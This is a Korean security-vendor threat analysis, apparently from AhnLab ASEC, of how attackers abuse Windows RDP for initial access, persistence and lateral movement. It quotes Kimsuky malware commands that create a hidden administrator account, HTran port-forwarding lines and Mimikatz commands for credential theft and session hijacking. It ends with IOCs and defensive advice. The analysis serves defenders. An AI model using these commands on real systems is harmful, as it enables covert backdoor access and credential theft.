RDP를 이용하는 공격 기법 및 사례 분석

개요

이전 블로그 “다양한 원격 제어 도구들을 악용하는 공격자들”^[1] 에서는 공격자들이 감염 시스템에 대한 제어를 획득하기 위해 시스템 관리 목적으로 사용되는 다양한 원격 제어 도구들을 악용하는 사례들을 다루었다. 여기에서는 윈도우 운영체제에서 기본적으로 제공하는 RDP(Remote Desktop Protocol)을 이용하는 사례들을 다룬다. 실제 대부분의 공격에서는 RDP가 자주 사용되는데 이는 추가적인 설치 과정이 필요한 원격 제어 도구들에 비해 초기 침투 과정이나 측면 이동에 유용하기 때문이다.

윈도우 운영체제는 원격 데스크탑 서비스(Remote Desktop Services)라고 하는 서비스를 지원하기 때문에 추가적인 원격 제어 도구들을 설치하는 과정 없이 이를 사용할 수 있다. 물론 원격 데스크탑 서비스가 활성화되어 있다는 가정 하에 가능하며 만약 그렇지 않은 경우에는 추가적인 작업을 통해 활성화가 가능하다.

초기 침투 관점에서 보자면 공격자들은 공격 대상 시스템에 대한 자격 증명 정보를 획득한 경우 RDP를 이용해 접속하여 제어를 획득할 수 있으며, 측면 이동 과정에서도 동일하기 때문에 수집한 내부 네트워크 시스템의 자격 증명 정보를 이용해 내부 전파하는 목적에서도 사용 가능하다. 물론 이러한 방식 외에도 지속성 유지를 위해 감염 시스템에 공격자가 사용할 계정을 추가하는 방식의 악성코드가 사용되기도 한다.

여기에서는 이러한 유형의 공격 사례들과 함께 RDP 공격에 사용될 수 있는 여러 기법들을 각각의 도구들과 함께 정리한다.

공격 사례

APT 공격 사례

RDP를 이용하는 공격 사례는 특히 APT 공격에서 자주 확인된다. ASEC 블로그 “동일한 패스워드가 설정된 Local Administrator 계정을 사용하는 기업의 랜섬웨어 감염 사례”에서는 공격자가 피해 시스템의 로컬 administrator 자격 증명 정보를 획득한 이후 RDP로 접속하여 Lockis 랜섬웨어를 설치한 사례를 다루었다.^[2]

ASEC 블로그 “Exchange Server 취약점부터 랜섬웨어 감염까지 단 7일”에서는 Exchange Server 취약점으로 초기 침투해 LockBit 3.0 랜섬웨어를 감염시킨 사례를 다루었다. 공격자는 웹쉘을 이용해 생성한 스크립트로 RDP 방화벽 정책 허용 및 활성화하였으며, 터널링 프로그램인 Plink를 이용해 외부 주소에 RDP 연결하여 제어를 획득하였다.^[3] 이외에도 Conti 랜섬웨어 공격 그룹^[4], DarkSide 랜섬웨어 공격 그룹^[5]을 포함한 다양한 APT 공격에서 SSH, PsExec 등과 함께 기본적으로 사용되고 있다.

윈도우에 기본적으로 설치되어 있는 원격 데스크톱 기능 외에도 공격자가 RDP Wrapper를 설치해 사용하는 경우도 존재한다. RDP Wrapper는 원격 데스크탑 기능을 지원하는 오픈 소스 유틸리티이다. 윈도우 운영체제는 모든 버전에서 원격 데스크탑을 지원하지 않기 때문에 이러한 환경에서는 RDP Wrapper를 설치하여 원격 데스크탑을 활성화할 수 있다. Kimsuky 그룹은 AppleSeed 악성코드가 감염된 다수의 시스템에 RDP Wrapper를 설치하고 있다.^[6]

사용자 계정 추가

위에서는 주로 감염 시스템의 사용자 자격 증명 정보를 탈취한 후 해당 정보로 RDP 접속을 하는 방식을 다루었다. 하지만 최근에는 감염 시스템에 새로운 사용자를 추가하여 해당 계정으로 접속하는 유형들도 다수 확인되고 있다. 공격자는 이러한 방식을 통해 언제든 감염 시스템에 접속할 수 있도록 지속성을 유지할 수 있다. 물론 새롭게 등록된 계정이 기존 사용자의 눈에 띄지 않아야 하기 때문에 추가한 계정을 숨기는 기법들도 함께 사용된다.

Kimsuky

Kimsuky 그룹에서도 이렇게 감염 시스템에 사용자 계정을 추가하는 악성코드를 유포한 이력이 존재한다.^[7] 스피어 피싱 메일의 첨부 파일로 위장한 PIF 드로퍼 악성코드들은 주로 AppleSeed를 드랍하지만 RDP 사용자를 추가하는 기능을 담당하는 악성코드도 유포하고 있다. 해당 악성코드는 최종적으로 다음과 같은 사용자 계정을 추가한다.

• 사용자 계정 : default
• 비밀번호 : 1qaz2wsx#EDC

사용자 계정 추가는 아래와 같이 단순한 커맨드 라인 명령을 실행하는 방식으로 수행한다. 그리고 아래의 커맨드 라인 명령이 끝나면, 즉 목적을 달성하면 배치 파일을 이용해 자가 삭제한다.

> net user /add default 1qaz2wsx#EDC
> net localgroup Administrators default /add
> net localgroup “Remote Desktop Users” default /add
> reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList” /v default /t REG_DWORD /d 0 /f
> reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

각 명령들을 보면 net 명령을 이용해 “default”라는 이름의 사용자를 등록하는 것을 확인할 수 있다. 해당 사용자는 관리자 그룹에 포함되며 RDP 그룹에도 포함시키기 때문에 추후 RDP 접속을 위한 목적으로 추정된다. 그리고 등록한 사용자 계정을 SpecialAccounts 레지스트리 키에 등록함으로써 이후 사용자가 로그인 화면에서도 계정이 추가된 점을 확인할 수 없게 한다.

MS-SQL 서버 대상 악성코드

최근에는 부적절하게 관리되고 있는 MS-SQL 서버를 대상으로 사용자 계정을 추가하는 악성코드가 유포되고 있다. 해당 시스템에 설치된 다른 악성코드들을 통해 유추했을때 취약한 계정 정보를 가짐에 따라 사전 공격을 통해 시스템 장악 후 악성코드를 설치한 것으로 추정된다. 해당 악성코드는 bat2exe로 제작되어 있으며 실행 시 다음과 같은 Batch 파일을 생성하고 실행한다.

Batch 스크립트의 기능은 위에서 다룬 Kimsuky 그룹에서 사용하는 유형과 유사하다. 사용자 계정을 추가하고 SpecialAccounts 계정으로 등록하여 사용자가 인지할 수 없도록 설정한다. 이외에도 방화벽 설정을 추가하고 RDP 서비스를 활성화한다.

계정 추가 도구

공격자들은 이렇게 직접 사용자 계정을 추가하는 형태의 악성코드 외에도 외부에 공개된 도구들을 이용해 사용자 계정을 추가할 수 있다. 예를 들어 다음은 GoLang으로 개발된 CreateHiddenAccount라고 하는 툴로서 깃허브에 공개되어 있다.^[8] 공격자는 부적절하게 관리된 MS-SQL 서버를 대상으로 위와 같은 복잡한 과정 없이 CreateHiddenAccount 악성코드를 이용해 사용자 계정을 추가할 수 있다.

RDP 관련 악성코드

Reverse RDP

현재 감염 시스템의 주소와 계정 정보를 알고 있다고 하더라도 만약 사설 네트워크에 존재할 경우에는 포트 포워딩과 같은 설정이 되어있지 않다면 직접적인 연결이 불가하다. 이는 대부분의 악성코드에서도 동일한데 이러한 환경을 위해 Reverse Shell 처럼 공격자가 감염 시스템에 먼저 접속하는 대신 감염 시스템에서 동작하는 악성코드가 공격자 즉 C&C 서버에 접속하는 방식이 사용된다.

AveMaria는 윈도우의 기본 RDP 대신 RdpWrapper를 사용한다.^[9] 이를 위해 먼저 RdpWrapper DLL을 감염 PC에 드랍하고 서비스에 등록한다. 이후 랜덤한 문자열을 생성하여 ID / PW로서 사용자 계정을 추가한다. 그리고 등록한 사용자 계정을 SpecialAccounts 레지스트리 키에 등록함으로써 사용자가 계정이 추가된 점을 확인할 수 없게 한다. 마지막으로 이렇게 추가한 ID / PW는 다음과 같은 레지스트리 키에 등록하여 저장한다.

• ID : HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer[랜덤] / rudp
• Password : HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer[랜덤] / rpdp

이후 AveMaria는 Reverse RDP 방식으로서 C&C 서버에 연결을 시도하기 때문에 공격자는 감염 PC의 AveMaria를 거쳐 원격 제어를 수행할 수 있다.

Port Forwarding

포트 포워딩이랑 특정 포트에서 전달받은 데이터를 다른 포트로 전달하는 기능이다. 이를 이용하면 위에서 다룬 AveMaria의 역할처럼 Reverse 방식으로 통신하여 NAT를 우회할 수 있으며 동시에 다른 포트 즉 RDP 포트로 데이터를 전달하여 원격 제어를 수행할 수 있게 된다.

이러한 포트 포워딩을 지원하는 툴들은 다양하지만 여기에서는 대표적으로 소스 코드가 공개되어 과거부터 사용되고 있는 HTran을 기준으로 설명한다. 먼저 HTran은 다음과 같이 3개의 모드가 지원된다.^[10]

HTran이 제공하는 모드 중에는 “-listen” 모드가 있는데 인자로 2개의 포트 번호를 전달받아 각각의 포트에 바인딩하면서 대기한다. 만약 2개의 인자로 모두 연결이 확립될 경우 둘 중 하나의 포트에서 전달받은 데이터를 다른 포트로 포워딩한다. 일반적으로 “-listen” 모드는 “-slave” 모드와 함께 사용될 것이다. “-slave” 모드는 “-tran” 모드와 유사한데 “-tran” 모드가 로컬 시스템의 특정 포트를 열고 대기하고 있었다면 “-slave”는 지정한 주소에 직접 연결한다.

다음은 “p”라는 이름을 갖는 HTran 악성코드가 “-slave” 모드로 실행된 로그이다. 이러한 인자를 받아 실행될 경우 A(1..**.8):1000 주소로 연결 시도하며, 연결이 확립되면 로컬 시스템의 3389번 포트로 포워딩한다.

> p 1..**.8 1000 127.0.0.1 3389

시스템 A:1000 에서는 다음과 같이 HTran이 “-listen” 모드로 실행 중일 것이다. (예시를 위해 첫 번째 인자를 80으로 사용) 이에 따라 공격자는 A:80 주소로 접근하여 공격 대상 시스템에 RDP 접속이 가능해진다. A에서 실행 중이던 HTran이 80번 포트에서 전달받은 데이터를 1000번 포트로 전달하며, 1000번 포트는 공격 대상 시스템에서 실행 중인 HTran과 연결되어 있기 때문이다. 최종적으로 공격 대상 시스템의 HTran은 전달받은 데이터를 로컬 시스템의 3389번 포트로 포워딩한다.

> HTran.exe 1000 80

Multi RDP

일반적인 윈도우 환경에서는 한 대의 PC에 하나의 RDP 접속만 허용된다. 이에 따라 공격자가 감염 시스템의 계정 정보를 알고 있다고 하더라도, 만약 기존 사용자가 로컬에서 작업 중이거나 또는 사용자가 RDP를 이용해 현재 시스템에 접속하여 사용하고 있을 경우에는 사용자의 인지 없이 RDP 연결이 불가하다. 현재 사용자가 작업 중인 환경에서 공격자가 RDP 연결을 시도할 경우 기존 사용자는 로그오프되기 때문이다.

이를 우회하기 위한 방식으로는 Remote Desktop Service의 메모리를 패치하여 다중 원격 데스크탑 접속을 허용하게 하는 방식이 있다. 대표적으로 Mimikatz도 ts::multirdp 명령을 통해 이러한 기능을 지원한다.^[11] ts::multirdp 명령을 사용하면 현재 실행 중인 Remote Desktop Service 즉 termsrv.dll을 로드한 svchost.exe에서 해당 DLL의 주소를 구한 후 특정 바이너리 패턴을 검색한다. 이는 윈도우 버전마다 다르기 때문에 각각의 버전에 따라 검색 패턴이 정의되어 있다. 정의된 패턴이 존재하면 이를 새로운 바이너리 패턴으로 패치하며, 패치 이후부터는 다중 RDP가 가능하다.

Kimsuky 그룹에도 미미카츠의 해당 기능과 유사하게 다중 RDP를 위한 메모리 패치를 전담하는 악성코드를 사용한다.^[12] 최근 Kimsuky 그룹에서 사용하는 대부분의 악성코드들과 유사하게 DLL이며 regsvr32.exe에 의해 실행되는 형태이다. 현재 확인된 샘플은 x64 바이너리이며 이에 따라 x64 윈도우 아키텍처에 대해서만 동작한다. 그리고 검색 패턴 및 패치 패턴은 미미카츠의 소스 코드와 유사한데, 차이점이 있다면 Windows XP 버전도 지원한다는 점이 있다. 다음은 각 윈도우 버전에서 검색 패턴 및 패치할 패턴 목록이다.

RDP 자격 증명 정보 탈취

사용자가 내부의 다른 시스템에 원격으로 접속하는 경우 RDP 계정 정보를 획득할 수 있다면 탈취한 자격 증명 정보로 측면 이동이 가능할 것이다. 이를 위해 공격자는 키로거를 설치하여 원격 데스크톱 로그인 시 계정 정보를 수집하거나, 로컬에 저장된 RDP 계정 정보를 탈취하여 다른 시스템에 자격 증명을 탈취할 수 있다. 미미카츠는 현재 사용자가 원격 데스크톱을 사용하거나 다른 사용자가 로그인한 경우에도 계정 정보 또한 탈취가 가능하다.

현재 시스템에 다른 사용자가 원격 데스크톱을 이용해 로그인해 있을 경우 미미카츠의 ts::logonpasswords 명령을 이용하면 현재 실행 중인 세션에서 원격 접속 자격 증명을 추출해 보여준다. 다음은 현재 시스템에 다른 사용자가 domain_admin 계정으로 로그인했을 경우 보여주는 결과이다.^[13]

반대로 ts::mstsc 명령은 사용자가 다른 시스템에 원격 데스크톱을 이용해 접속하여 작업하는 경우, 현재 실행 중인 mstsc 프로세스에서 원격 접속한 대상에 대한 자격 증명을 추출하여 보여준다. 즉 다른 경로의 시스템에 domain_admin 계정으로 로그인하여 작업 중 미미카츠의 ts::mstsc 명령이 실행되면, 대상 시스템에 접속할 때 사용한 자격 증명에 대한 탈취가 가능한 것이다.

일반적으로 원격 데스크톱을 자주 사용하는 대상이 있을 경우 RDP 접속 시 매번 ID / PW 를 입력하는 대신 자동으로 로그인이 가능하도록 저장할 수 있다. 이 경우 RDP 자격 증명 정보는 로컬의 Vault에 저장이 된다. 미미카츠는 vault::cred 명령으로 Vault에 저장된 RDP 자격 증명 정보를 탈취할 수 있기 때문에, 현재 특정 대상에 원격 접속하는 중이거나 다른 사용자가 원격으로 접속 중이 아니라고 하더라도 로컬에 RDP 자격 증명이 저장되어 있을 경우 탈취가 가능하다.

RDP Hijacking

RDP 하이재킹은 다른 사용자의 원격 데스크톱 세션을 가로채어 측면 이동에 사용하는 기법이다. 공격자가 현재 시스템에서 시스템 권한을 획득한 경우 RDP 하이재킹 기법을 이용하면 다른 사용자의 자격 증명을 알지 못하더라도 RDP 세션을 가로챌 수 있다. 즉 어떤 시스템을 탈취하여 시스템 권한까지 획득한 공격자는 해당 서버에 원격 데스크톱을 이용해 접속한 다른 사용자들의 세션들을 가로채어 탈취한 사용자의 세션으로 시스템에 접속할 수 있다. 이는 원격 및 로컬에서 모두 사용 가능하며, 로그오프되지 않은 세션이라면 현재 활성화된 세션이든 연결이 비활성화된 세션이든 동일하게 사용 가능하다.

대표적으로 RDP Hijacking을 위해 공격자는 터미널 서비스 콘솔(tscon.exe)을 이용할 수 있으며, 미미카츠도 “ts::remote” 명령을 통해 이를 지원한다. 미미카츠는 “privilege::debug” 명령과 “token::elevate” 명령으로 시스템 권한까지 획득할 수 있다. 이후 “ts::sessions” 명령으로 현재 세션을 확인할 수 있으며, 만약 하이재킹하려는 세션의 번호가 2인 경우 “ts::remote /id:2” 명령을 입력하면 대상 세션으로 전환된다

측면 이동 (Lateral Movement)

지금까지 살펴본 사례들처럼 RDP는 초기 침투 방식뿐만 아니라 측면 이동 기법으로도 자주 사용된다. 중요한 점은 공격 대상 시스템의 자격 증명 정보를 평문으로 알지 못한다고 하더라도 NT Hash로 측면 이동 공격이 가능하다는 점이다. 평문 비밀번호가 아니라고 하더라도 xfreerdp와 같은 툴을 이용하면 SMB, WMI 처럼 NT Hash를 이용하는 Pass the Hash 공격에 RDP 프로토콜 또한 사용 가능하다.

만약 원격 시스템에 “제한된 관리 모드”가 활성화되어 있을 경우 mstsc를 이용할 수도 있다. 참고로 제한된 관리 모드를 활성화하기 위해서는 아래와 같은 레지스트리가 설정되어 있어야 한다.

HKLM\SYSTEM\CurrentControlSet\Control\LSA / “DisableRestrictedAdmin” (DWORD)

• 0 : 제한된 관리 모드 활성화

아래에서는 확보한 도메인 관리자 계정의 NT Hash를 이용해 Overpass the Hash 공격으로 mstsc를 “제한된 관리 모드”로 실행하였다. mstsc의 팝업을 보면 “연결하는 데 Windows 로그온 자격 증명이 사용됩니다.”라는 문구가 보인다. 이후 원격 시스템의 주소를 입력하고 연결하면 계정 정보를 입력할 필요 없이 연결이 성공하는 것을 확인할 수 있다.

결론

공격자들은 과거부터 꾸준히 초기 침투 과정 및 측면 이동 과정에서 RDP를 사용하고 있다. 그리고 최근에는 추가적인 백도어 악성코드를 설치하는 대신 사용자 계정을 추가해 제어를 획득하는 기법이 사용되고 있다. 유출된 계정 정보를 이용하는 방식 및 공격자가 직접 계정을 추가하는 방식 모두 윈도우에 기본적으로 설치되어 있는 원격 데스크탑 서비스를 이용하기 때문에 이를 탐지하거나 예방하기 위해서는 적절한 관리가 필요하다.

사용자들은 의심스러운 메일을 받게 된다면 첨부 파일의 실행을 지양해야 하며, 외부에서 프로그램 설치 시 공식 홈페이지에서 구매하거나 다운로드하는 것을 권장한다. 그리고 계정의 비밀번호를 복잡한 형태로 사용 및 주기적으로 변경해야 한다. 또한 V3를 최신 버전으로 업데이트하여 악성코드의 감염을 사전에 차단할 수 있도록 신경 써야 한다.

[파일 진단]
– Trojan/Win.Agent.C5245646 (2022.09.27.02)
– Trojan/BAT.Agent.SC183591 (2022.09.27.03)
– Malware/Win.Generic.C4933135 (2022.01.27.00)
– HackTool/Win.UserAdd.C5271969 (2022.10.04.02)

IOC
MD5
– 81ee91290a78d2d38b47a7ae25ec717f : 사용자 계정 추가 악성코드
– 185bc3037314ec2dbd6591ad72cf08b4 : CreateHiddenAccount
– b500a8ffd4907a1dfda985683f1de1df : CreateHiddenAccount

다운로드 주소
– hxxp://80.66.76[.]22/servicem.exe : 사용자 계정 추가 악성코드

참고
^[1] [ASEC Blog] 다양한 원격 제어 도구들을 악용하는 공격자들
^[2] [ASEC Blog] 동일한 패스워드가 설정된 Local Administrator 계정을 사용하는 기업의 랜섬웨어 감염 사례
^[3] [ASEC Blog] Exchange Server 취약점부터 랜섬웨어 감염까지 단 7일
^[4] [The DFIR Report] BazarLoader and the Conti Leaks
^[5] [Cyware] DarkSide: A Deep Dive Into The Threat Actor That Took Colonial Pipeline Down
^[6] [ASEC Blog] Kimsuky 그룹의 APT 공격 분석 보고서 (AppleSeed, PebbleDash)
^[7] [ASEC Blog] Kimsuky 그룹의 APT 공격 분석 보고서 (AppleSeed, PebbleDash)
^[8] [Github] CreateHiddenAccount
^[9] [ASEC Blog] 스팸 메일로 유포 중인 AveMaria 악성코드
^[10] [ASEC Blog] 국내 기업 타겟의 FRP(Fast Reverse Proxy) 사용하는 공격 그룹
^[11] [AhnLab TIP] 미미카츠를 이용한 내부망 전파 기법 분석 보고서
^[12] [ASEC Blog] Kimsuky 그룹의 APT 공격 분석 보고서 (AppleSeed, PebbleDash)
^[13] [AhnLab TIP] 미미카츠를 이용한 내부망 전파 기법 분석 보고서

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.